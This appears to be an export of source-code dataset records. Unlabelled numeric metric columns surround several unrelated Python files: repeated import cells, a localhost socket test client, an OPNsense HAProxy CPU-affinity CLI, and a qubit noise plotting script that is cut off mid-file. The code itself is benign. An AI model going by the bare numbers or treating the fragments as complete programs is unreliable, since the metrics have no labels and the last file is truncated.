| 0.893914
| 0.885353
| 0.883771
| 0.881537
| 0
| 0.106506
| 0.314946
| 21,518
| 789
| 119
| 27.272497
| 0.622482
| 0.376568
| 0
| 0.754875
| 0
| 0
| 0.011032
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103064
| false
| 0
| 0.036212
| 0
| 0.281337
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c7d513bc90ee257215305e25f89415d4ac72687c
| 2,967
|
py
|
Python
|
multiinstance/None.py
|
Dzeiberg/multiinstance
|
95b70e066610b1935cda9086d8fb8609809e7d15
|
[
"Apache-2.0"
] | null | null | null |
multiinstance/None.py
|
Dzeiberg/multiinstance
|
95b70e066610b1935cda9086d8fb8609809e7d15
|
[
"Apache-2.0"
] | null | null | null |
multiinstance/None.py
|
Dzeiberg/multiinstance
|
95b70e066610b1935cda9086d8fb8609809e7d15
|
[
"Apache-2.0"
] | null | null | null |
# Cell
from .utils import *
from .distanceApproaches import *
from .data.syntheticData import buildDataset,getBag
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.ensemble import BaggingClassifier
from sklearn.metrics import roc_auc_score
from sklearn.neighbors import KernelDensity
import scipy.stats as ss
from tqdm.notebook import tqdm
# Cell
from .utils import *
from .distanceApproaches import *
from .data.syntheticData import buildDataset,getBag
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.ensemble import BaggingClassifier
from sklearn.metrics import roc_auc_score
from sklearn.neighbors import KernelDensity
import scipy.stats as ss
from tqdm.notebook import tqdm
# Cell
from .utils import *
from .distanceApproaches import *
from .data.syntheticData import buildDataset,getBag
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.ensemble import BaggingClassifier
from sklearn.metrics import roc_auc_score
from sklearn.neighbors import KernelDensity
import scipy.stats as ss
from tqdm.notebook import tqdm
# Cell
import autograd
from autograd import grad,jacobian,hessian
from autograd.scipy import stats as agss
import autograd.numpy as np
import matplotlib.pyplot as plt
from tqdm.notebook import tqdm
import scipy.stats as ss
import os
from scipy.optimize import minimize
from glob import glob
from .likelihoodMethods import *
import scipy.stats as ss
from .data.syntheticData import buildDataset
from .utils import *
from .agglomerative_clustering import AgglomerativeClustering
os.sched_setaffinity(0,set(range(20,40)))
# Cell
import autograd
from autograd import grad,jacobian,hessian
from autograd.scipy import stats as agss
import autograd.numpy as np
import matplotlib.pyplot as plt
from tqdm.notebook import tqdm
import scipy.stats as ss
import os
from scipy.optimize import minimize
from glob import glob
from .likelihoodMethods import *
import scipy.stats as ss
from .data.syntheticData import buildDataset
from .utils import *
from .agglomerative_clustering import AgglomerativeClustering
os.sched_setaffinity(0,set(range(20,40)))
# Cell
import autograd
from autograd import grad,jacobian,hessian
from autograd.scipy import stats as agss
import autograd.numpy as np
import matplotlib.pyplot as plt
from tqdm.notebook import tqdm
import scipy.stats as ss
import os
from scipy.optimize import minimize
from glob import glob
from .likelihoodMethods import *
import scipy.stats as ss
from .data.syntheticData import buildDataset
from .utils import *
from .agglomerative_clustering import AgglomerativeClustering
os.sched_setaffinity(0,set(range(20,40)))
| 21.816176
| 61
| 0.827098
| 420
| 2,967
| 5.807143
| 0.133333
| 0.067651
| 0.059041
| 0.066421
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.005814
| 0.130435
| 2,967
| 136
| 62
| 21.816176
| 0.939535
| 0.009774
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.965517
| 0
| 0.965517
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
c7dedc3412466e3344ec5f98c60dd41f4b02ca92
| 1,576
|
py
|
Python
|
server/db/test.py
|
e7/treasure-box
|
1ad4818e7535b80a3ad3e0cb74087a2ce43a9dc8
|
[
"Apache-2.0"
] | null | null | null |
server/db/test.py
|
e7/treasure-box
|
1ad4818e7535b80a3ad3e0cb74087a2ce43a9dc8
|
[
"Apache-2.0"
] | null | null | null |
server/db/test.py
|
e7/treasure-box
|
1ad4818e7535b80a3ad3e0cb74087a2ce43a9dc8
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python
# -*- coding:utf-8 -*-
import socket
import errno
import struct
import time
import json
if "__main__" == __name__:
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
skt.connect(("127.0.0.1", 8889))
'''
context = json.dumps({"interface":"insert", "email":"jackzxty@126.com"})
data = struct.pack("!4I", 1000, 16, len(context), 0)
skt.sendall(data + context)
rsp = skt.recv(4096)
version, start, length, checksum = struct.unpack("!4I", rsp[0:16])
print version, start, length, checksum
print(json.loads(rsp[16:]))
context = json.dumps({"interface":"update", "uid":"1", "email":"chg"})
data = struct.pack("!4I", 1000, 16, len(context), 0)
skt.sendall(data + context)
rsp = skt.recv(4096)
version, start, length, checksum = struct.unpack("!4I", rsp[0:16])
print version, start, length, checksum
print(json.loads(rsp[16:]))
context = json.dumps({"interface":"delete", "uid":"16"})
data = struct.pack("!4I", 1000, 16, len(context), 0)
skt.sendall(data + context)
rsp = skt.recv(4096)
version, start, length, checksum = struct.unpack("!4I", rsp[0:16])
print version, start, length, checksum
print(json.loads(rsp[16:]))
'''
context = json.dumps({"interface":"select", "uid":"26"})
data = struct.pack("!4I", 1000, 16, len(context), 0)
skt.sendall(data + context)
rsp = skt.recv(4096)
version, start, length, checksum = struct.unpack("!4I", rsp[0:16])
print version, start, length, checksum
print(json.loads(rsp[16:]))
| 32.163265
| 76
| 0.625
| 217
| 1,576
| 4.493088
| 0.262673
| 0.098462
| 0.147692
| 0.213333
| 0.749744
| 0.749744
| 0.749744
| 0.749744
| 0.749744
| 0.749744
| 0
| 0.071373
| 0.182107
| 1,576
| 48
| 77
| 32.833333
| 0.685027
| 0.02665
| 0
| 0
| 0
| 0
| 0.081749
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0.133333
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
c7f1ed3360455b177b887860b17f2df1967bf4ca
| 10,110
|
py
|
Python
|
opnsense_cli/commands/plugin/haproxy/cpu.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 13
|
2021-05-17T10:42:25.000Z
|
2022-02-21T02:10:41.000Z
|
opnsense_cli/commands/plugin/haproxy/cpu.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 14
|
2021-05-17T13:53:27.000Z
|
2021-12-16T12:45:44.000Z
|
opnsense_cli/commands/plugin/haproxy/cpu.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 2
|
2021-04-28T08:41:07.000Z
|
2022-03-28T10:20:51.000Z
|
import click
from opnsense_cli.formatters.cli_output import CliOutputFormatter
from opnsense_cli.callbacks.click import \
formatter_from_formatter_name, bool_as_string, available_formats, tuple_to_csv
from opnsense_cli.commands.plugin.haproxy import haproxy
from opnsense_cli.api.client import ApiClient
from opnsense_cli.api.plugin.haproxy import Settings, Service
from opnsense_cli.facades.commands.plugin.haproxy.cpu import HaproxyCpuFacade
pass_api_client = click.make_pass_decorator(ApiClient)
pass_haproxy_cpu_svc = click.make_pass_decorator(HaproxyCpuFacade)
@haproxy.group()
@pass_api_client
@click.pass_context
def cpu(ctx, api_client: ApiClient, **kwargs):
"""
CPU affinity rules.
"""
settings_api = Settings(api_client)
service_api = Service(api_client)
ctx.obj = HaproxyCpuFacade(settings_api, service_api)
@cpu.command()
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="table",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c '') to show all columns',
default=(
"uuid,enabled,name,process_id,thread_id,cpu_id"
),
show_default=True,
)
@pass_haproxy_cpu_svc
def list(haproxy_cpu_svc: HaproxyCpuFacade, **kwargs):
"""
Show all cpu
"""
result = haproxy_cpu_svc.list_cpus()
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@cpu.command()
@click.argument('uuid')
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="table",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c '') to show all columns',
default=(
"uuid,enabled,name,process_id,thread_id,cpu_id"
),
show_default=True,
)
@pass_haproxy_cpu_svc
def show(haproxy_cpu_svc: HaproxyCpuFacade, **kwargs):
"""
Show details for cpu
"""
result = haproxy_cpu_svc.show_cpu(kwargs['uuid'])
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@cpu.command()
@click.argument('name')
@click.option(
'--enabled/--no-enabled',
help=('Enable this CPU affinity rule.'),
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=True,
)
@click.option(
'--process_id',
help=('Process ID that should bind to a specific CPU set. Any process IDs above nbproc are ignored.'),
type=click.Choice(
[
'all', 'odd', 'even', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6', 'x7', 'x8', 'x9', 'x10', 'x11', 'x12', 'x13',
'x14', 'x15', 'x16', 'x17', 'x18', 'x19', 'x20', 'x21', 'x22', 'x23', 'x24', 'x25', 'x26', 'x27', 'x28',
'x29', 'x30', 'x31', 'x32', 'x33', 'x34', 'x35', 'x36', 'x37', 'x38', 'x39', 'x40', 'x41', 'x42', 'x43',
'x44', 'x45', 'x46', 'x47', 'x48', 'x49', 'x50', 'x51', 'x52', 'x53', 'x54', 'x55', 'x56', 'x57', 'x58',
'x59', 'x60', 'x61', 'x62', 'x63'
]
),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None,
required=True,
)
@click.option(
'--thread_id',
help=('Thread ID that should bind to a specific CPU set. Any thread IDs above nbthread are ignored.'),
type=click.Choice(
[
'all', 'odd', 'even', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6', 'x7', 'x8', 'x9', 'x10', 'x11', 'x12', 'x13',
'x14', 'x15', 'x16', 'x17', 'x18', 'x19', 'x20', 'x21', 'x22', 'x23', 'x24', 'x25', 'x26', 'x27', 'x28',
'x29', 'x30', 'x31', 'x32', 'x33', 'x34', 'x35', 'x36', 'x37', 'x38', 'x39', 'x40', 'x41', 'x42', 'x43',
'x44', 'x45', 'x46', 'x47', 'x48', 'x49', 'x50', 'x51', 'x52', 'x53', 'x54', 'x55', 'x56', 'x57', 'x58',
'x59', 'x60', 'x61', 'x62', 'x63'
]
),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None,
required=True,
)
@click.option(
'--cpu_id',
help=('Bind the process/thread ID to this CPU.'),
type=click.Choice(
[
'all', 'odd', 'even', 'x0', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6', 'x7', 'x8', 'x9', 'x10', 'x11', 'x12',
'x13', 'x14', 'x15', 'x16', 'x17', 'x18', 'x19', 'x20', 'x21', 'x22', 'x23', 'x24', 'x25', 'x26', 'x27',
'x28', 'x29', 'x30', 'x31', 'x32', 'x33', 'x34', 'x35', 'x36', 'x37', 'x38', 'x39', 'x40', 'x41', 'x42',
'x43', 'x44', 'x45', 'x46', 'x47', 'x48', 'x49', 'x50', 'x51', 'x52', 'x53', 'x54', 'x55', 'x56', 'x57',
'x58', 'x59', 'x60', 'x61', 'x62', 'x63'
]
),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=None,
required=True,
)
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="plain",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c '') to show all columns',
default="result,validations",
show_default=True,
)
@pass_haproxy_cpu_svc
def create(haproxy_cpu_svc: HaproxyCpuFacade, **kwargs):
"""
Create a new cpu
"""
json_payload = {
'cpu': {
"enabled": kwargs['enabled'],
"name": kwargs['name'],
"process_id": kwargs['process_id'],
"thread_id": kwargs['thread_id'],
"cpu_id": kwargs['cpu_id'],
}
}
result = haproxy_cpu_svc.create_cpu(json_payload)
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@cpu.command()
@click.argument('uuid')
@click.option(
'--enabled/--no-enabled',
help=('Enable this CPU affinity rule.'),
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--name',
help=('Choose a name for this CPU affinity rule.'),
show_default=True,
default=None
)
@click.option(
'--process_id',
help=('Process ID that should bind to a specific CPU set. Any process IDs above nbproc are ignored.'),
type=click.Choice(
[
'all', 'odd', 'even', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6', 'x7', 'x8', 'x9', 'x10', 'x11', 'x12', 'x13',
'x14', 'x15', 'x16', 'x17', 'x18', 'x19', 'x20', 'x21', 'x22', 'x23', 'x24', 'x25', 'x26', 'x27', 'x28',
'x29', 'x30', 'x31', 'x32', 'x33', 'x34', 'x35', 'x36', 'x37', 'x38', 'x39', 'x40', 'x41', 'x42', 'x43',
'x44', 'x45', 'x46', 'x47', 'x48', 'x49', 'x50', 'x51', 'x52', 'x53', 'x54', 'x55', 'x56', 'x57', 'x58',
'x59', 'x60', 'x61', 'x62', 'x63'
]
),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--thread_id',
help=('Thread ID that should bind to a specific CPU set. Any thread IDs above nbthread are ignored.'),
type=click.Choice(
[
'all', 'odd', 'even', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6', 'x7', 'x8', 'x9', 'x10', 'x11', 'x12', 'x13',
'x14', 'x15', 'x16', 'x17', 'x18', 'x19', 'x20', 'x21', 'x22', 'x23', 'x24', 'x25', 'x26', 'x27', 'x28',
'x29', 'x30', 'x31', 'x32', 'x33', 'x34', 'x35', 'x36', 'x37', 'x38', 'x39', 'x40', 'x41', 'x42', 'x43',
'x44', 'x45', 'x46', 'x47', 'x48', 'x49', 'x50', 'x51', 'x52', 'x53', 'x54', 'x55', 'x56', 'x57', 'x58',
'x59', 'x60', 'x61', 'x62', 'x63'
]
),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--cpu_id',
help=('Bind the process/thread ID to this CPU.'),
type=click.Choice(
[
'all', 'odd', 'even', 'x0', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6', 'x7', 'x8', 'x9', 'x10', 'x11', 'x12',
'x13', 'x14', 'x15', 'x16', 'x17', 'x18', 'x19', 'x20', 'x21', 'x22', 'x23', 'x24', 'x25', 'x26', 'x27',
'x28', 'x29', 'x30', 'x31', 'x32', 'x33', 'x34', 'x35', 'x36', 'x37', 'x38', 'x39', 'x40', 'x41', 'x42',
'x43', 'x44', 'x45', 'x46', 'x47', 'x48', 'x49', 'x50', 'x51', 'x52', 'x53', 'x54', 'x55', 'x56', 'x57',
'x58', 'x59', 'x60', 'x61', 'x62', 'x63'
]
),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="plain",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c '') to show all columns',
default="result,validations",
show_default=True,
)
@pass_haproxy_cpu_svc
def update(haproxy_cpu_svc: HaproxyCpuFacade, **kwargs):
"""
Update a cpu.
"""
json_payload = {
'cpu': {}
}
options = ['enabled', 'name', 'process_id', 'thread_id', 'cpu_id']
for option in options:
if kwargs[option.lower()] is not None:
json_payload['cpu'][option] = kwargs[option.lower()]
result = haproxy_cpu_svc.update_cpu(kwargs['uuid'], json_payload)
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@cpu.command()
@click.argument('uuid')
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="plain",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c '') to show all columns',
default="result,validations",
show_default=True,
)
@pass_haproxy_cpu_svc
def delete(haproxy_cpu_svc: HaproxyCpuFacade, **kwargs):
"""
Delete cpu
"""
result = haproxy_cpu_svc.delete_cpu(kwargs['uuid'])
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
| 33.366337
| 116
| 0.56815
| 1,262
| 10,110
| 4.4271
| 0.142631
| 0.039377
| 0.051011
| 0.027564
| 0.804009
| 0.773403
| 0.759442
| 0.751387
| 0.745481
| 0.745481
| 0
| 0.088687
| 0.214837
| 10,110
| 302
| 117
| 33.476821
| 0.615142
| 0.009397
| 0
| 0.712121
| 0
| 0
| 0.280331
| 0.013503
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022727
| false
| 0.05303
| 0.026515
| 0
| 0.049242
| 0.018939
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
400ee2ca7cf76b096ea6a662d8f0b8ce121f4276
| 40
|
py
|
Python
|
hywaves/statistical/plots/__init__.py
|
ripolln/hywaves
|
14fb9001e18db375c2852b83db6a5494ec92064b
|
[
"MIT"
] | null | null | null |
hywaves/statistical/plots/__init__.py
|
ripolln/hywaves
|
14fb9001e18db375c2852b83db6a5494ec92064b
|
[
"MIT"
] | null | null | null |
hywaves/statistical/plots/__init__.py
|
ripolln/hywaves
|
14fb9001e18db375c2852b83db6a5494ec92064b
|
[
"MIT"
] | null | null | null |
from . import config
from . import mda
| 10
| 20
| 0.725
| 6
| 40
| 4.833333
| 0.666667
| 0.689655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.225
| 40
| 3
| 21
| 13.333333
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
406ea50651ff9a38d46136ee130c31a1ca4c1386
| 10,417
|
py
|
Python
|
Programs/Plots/noise_plots.py
|
qismib/TSINAME
|
98734555fe8bf99e72687e8697721db2770c8862
|
[
"MIT"
] | 1
|
2021-03-14T19:02:29.000Z
|
2021-03-14T19:02:29.000Z
|
Programs/Plots/noise_plots.py
|
qismib/TSINAME
|
98734555fe8bf99e72687e8697721db2770c8862
|
[
"MIT"
] | null | null | null |
Programs/Plots/noise_plots.py
|
qismib/TSINAME
|
98734555fe8bf99e72687e8697721db2770c8862
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
from matplotlib.collections import EventCollection
import numpy as np
plt.rc('xtick', labelsize=16)
plt.rc('ytick', labelsize=16)
def autolabel(rects):
"""
Attach a text label above each bar displaying its height
"""
for rect in rects:
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2., height + 3, '%f' % height + " %", ha='center', va='bottom')
# '%f' % height + " %" means that I am substituting ''height + " %"''
# in the string which is passed as argument of the function
# (height is passed as a float (--> '%f'), ''%'' as a string character)
# --------------------------------------------- Main program
"""
# Santiago, |0> test
qubit_number = [1,2,3,4,5]
noise = [1,0,5.05,1,2]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["b", "b", "b", "b", "b"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:blue')
plt.suptitle("Backend: ibmq_santiago", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n|0> test", fontsize=12)
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Santiago, |-> test
qubit_number = [1,2,3,4,5]
noise = [2,3,2.02,1,3]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["b", "b", "b", "b", "b"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:blue')
plt.suptitle("Backend: ibmq_santiago", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n| - > test", fontsize=12)
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Vigo, |0> test
qubit_number = [1,2,3,4,5]
noise = [3,3,2.02,1,6]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["g", "g", "g", "g", "g"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:green')
plt.suptitle("Backend: ibmq_vigo", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n|0> test", fontsize=12)
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Vigo, |-> test
qubit_number = [1,2,3,4,5]
noise = [12,3,4.04,5,5]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["g", "g", "g", "g", "g"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:green')
plt.suptitle("Backend: ibmq_vigo", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n| - > test", fontsize=12)
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Yorktown, |0> test
qubit_number = [1,2,3,4,5]
noise = [0,2,7.07,10,5]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["r", "r", "r", "r", "r"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:red')
plt.suptitle("Backend: ibmq_5_yorktown", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n|0> test", fontsize=12)
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Yorktown, |-> test
qubit_number = [1,2,3,4,5]
noise = [8,4,29.29,28,21]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["r", "r", "r", "r", "r"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:red')
plt.suptitle("Backend: ibmq_5_yorktown", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n| - > test", fontsize=12)
"""
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Total
fig, ax = plt.subplots(figsize=(10, 6))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
plt.suptitle("Noise tests", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel", fontsize=12)
plt.axis([0.5, 5.5, -12, 45])
sfasamento1 = [0.1, 0.1, 0.1, 0.1, 0.1]
sfasamento2 = [0.06, 0.06, 0.06, 0.06, 0.06]
sfasamento3 = [0.03, 0.03, 0.03, 0.03, 0.03]
ax.axvspan(0.8, 1.2, alpha=0.2) # Serve a colorare una certa area
ax.axvspan(1.8, 2.2, alpha=0.2)
ax.axvspan(2.8, 3.2, alpha=0.2)
ax.axvspan(3.8, 4.2, alpha=0.2)
ax.axvspan(4.8, 5.2, alpha=0.2)
# Santiago, |0> test
x = [1,2,3,4,5]
y = [1,0,5.05,1,2]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] + sfasamento1[k]
ax.plot(x, y, color="b", label="ibmq_santiago: |0> test")
plt.errorbar(x, y, yerr=yerr, fmt="bo")
# Santiago, |-> test
x = [1,2,3,4,5]
y = [2,3,2.02,1,3]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] - sfasamento1[k]
ax.plot(x, y, "b--", label="ibmq_santiago: |-> test")
plt.errorbar(x, y, yerr=yerr, fmt="bo")
# Vigo, |0> test
x = [1,2,3,4,5]
y = [3,3,2.02,1,6]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] + sfasamento2[k]
ax.plot(x, y, color="g", label="ibmq_vigo: |0> test")
plt.errorbar(x, y, yerr=yerr, fmt="go")
# Vigo, |-> test
x = [1,2,3,4,5]
y = [12,3,4.04,5,5]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] - sfasamento2[k]
ax.plot(x, y, "g--", label="ibmq_vigo: |-> test")
plt.errorbar(x, y, yerr=yerr, fmt="go")
# Yorktown, |0> test
x = [1,2,3,4,5]
y = [0,2,7.07,10,5]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] + sfasamento3[k]
ax.plot(x, y, color="r", label="ibmq_5_yorktown: |0> test")
plt.errorbar(x, y, yerr=yerr, fmt="ro")
# Yorktown, |-> test
x = [1,2,3,4,5]
y = [8,4,29.29,28,21]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] - sfasamento3[k]
ax.plot(x, y, "r--", label="ibmq_5_yorktown: |-> test")
plt.errorbar(x, y, yerr=yerr, fmt="ro")
x0 = [0.5,5.5]
y0 = [0,0]
plt.plot(x0, y0, "c:", label="Ideal case (no noise)", linewidth=2)
plt.legend()
# -------------------------------------------------------------------------------------------
# Total ma separato per i due tipi
fig, ax = plt.subplots(figsize=(10, 6))
ax.set_ylabel("Probability (%)", fontsize=16)
ax.set_xlabel("N (number of qubits in parallel)", fontsize=16)
plt.title("Probability of having an error with N qubits in parallel\n|0> test", fontsize=16)
plt.axis([0.5, 5.5, -12, 45])
sfasamento1 = [-0.1, -0.1, -0.1, -0.1, -0.1]
sfasamento2 = [0, 0, 0, 0, 0]
sfasamento3 = [0.1, 0.1, 0.1, 0.1, 0.1]
ax.axvspan(0.8, 1.2, alpha=0.2) # Serve a colorare una certa area
ax.axvspan(1.8, 2.2, alpha=0.2)
ax.axvspan(2.8, 3.2, alpha=0.2)
ax.axvspan(3.8, 4.2, alpha=0.2)
ax.axvspan(4.8, 5.2, alpha=0.2)
# Santiago, |0> test
x = [1,2,3,4,5]
y = [1,0,5.05,1,2]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] + sfasamento1[k]
ax.plot(x, y, "b-.", label="ibmq_santiago")
plt.errorbar(x, y, yerr=yerr, fmt="bo")
# Vigo, |0> test
x = [1,2,3,4,5]
y = [3,3,2.02,1,6]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] + sfasamento2[k]
ax.plot(x, y, "g-.", label="ibmq_vigo")
plt.errorbar(x, y, yerr=yerr, fmt="go")
# Yorktown, |0> test
x = [1,2,3,4,5]
y = [0,2,7.07,10,5]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] + sfasamento3[k]
ax.plot(x, y, "r-.", label="ibmq_5_yorktown")
plt.errorbar(x, y, yerr=yerr, fmt="ro")
x0 = [0.5,5.5]
y0 = [0,0]
plt.plot(x0, y0, "c:", label="Ideal case (no noise)", linewidth=2)
plt.legend()
# ------------------------------------
fig, ax = plt.subplots(figsize=(10, 6))
ax.set_ylabel("Probability (%)", fontsize=16)
ax.set_xlabel("N (number of qubits in parallel)", fontsize=16)
plt.title("Probability of having an error with N qubits in parallel\n|-> test", fontsize=16)
plt.axis([0.5, 5.5, -12, 45])
sfasamento1 = [-0.1, -0.1, -0.1, -0.1, -0.1]
